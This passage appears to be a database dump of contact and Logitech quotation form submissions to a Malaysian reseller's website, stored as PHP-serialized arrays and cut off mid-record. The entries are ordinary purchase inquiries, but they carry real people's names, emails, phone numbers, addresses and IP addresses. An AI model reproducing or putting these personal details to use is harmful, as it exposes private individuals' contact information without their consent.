Chan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sensedesign.arch@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60122122009\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:41:\"Sense Design &amp; Architecture Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:67:\"KA1-15-11, Kuchai Avenue, Kuchai Entrepreneur Park. Kuchai Lama. KL\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"Logitech Connect, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:62:\"I need the Logitech CC3500E set with 2 nos group expansion mic\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"19\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-16 14:31:56','192.228.183.66','1'),(25,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Isnazli Ismail\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"isnazli@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"+606063852861\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Istech Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"Hi, Do you sell symcode MJ 9120B, thank you.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"13\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-17 10:20:29','14.192.214.201','1'),(26,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Fatma\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"fatma@cwisb.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01162298992\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Creative World Industries Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:180:\"Hi, can we email email to request pricing for Wacom product? This is for GIATMARA tender submission on 28 January 2019. Response from your side is very much appreciated. Thank you.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-18 10:27:12','175.139.148.129','1'),(27,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"yasyar yusof\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"yasyaryusof@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0134420568\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"yasyaryusof\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:104:\"hello bintara solutions Sdn. Bhd. boleh bagi saya senarai spec utk semua jenis &quot;tablet&quot; wacom?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"93\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-18 12:27:04','1.9.124.220','1'),(28,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"MUTAHAR AHMED YAHYA alshami\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"mutashami@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0182313286\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"upm\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:57:\"BLOCK M8, UNIT 203, JALAN PERSIARAN PANDAN 7, PANDAN JAYA\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Logitech Rally, SMARTDOCK\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:90:\"I would like to get a quote for these items. Just hardware, no installation needed. Thanks\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"34\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-20 01:42:02','175.142.199.90','1'),(29,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Mohammed Al-Dailami\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"dailami@simonix.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0133446944\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Simonix Digital Labs\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Shah Alam\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Logitech Group, Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:82:\"Looking for video conferencing solutions for large meeting rooms (20 to 30 people)\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-22 11:28:37','124.13.203.15','1'),(30,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"mohd amin hassan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"amin9168@uitm.edu.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0355435148\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Universiti teknologi mara, shah alam\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:107:\"pejabat pascasiswazah, aras 10, bangunan sains dan kejuruteraan, Universiti teknologi mara, 40450 shah alam\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Logitech Group, Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"split quotation\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-22 15:43:11','202.58.86.79','1'),(31,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Tun Amirul\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"tun.amirul_exts@edotcogroup.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193541774\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Edotco Malaysia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Level 19 AXIATA TOWER\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"Inquiry price for Logitech 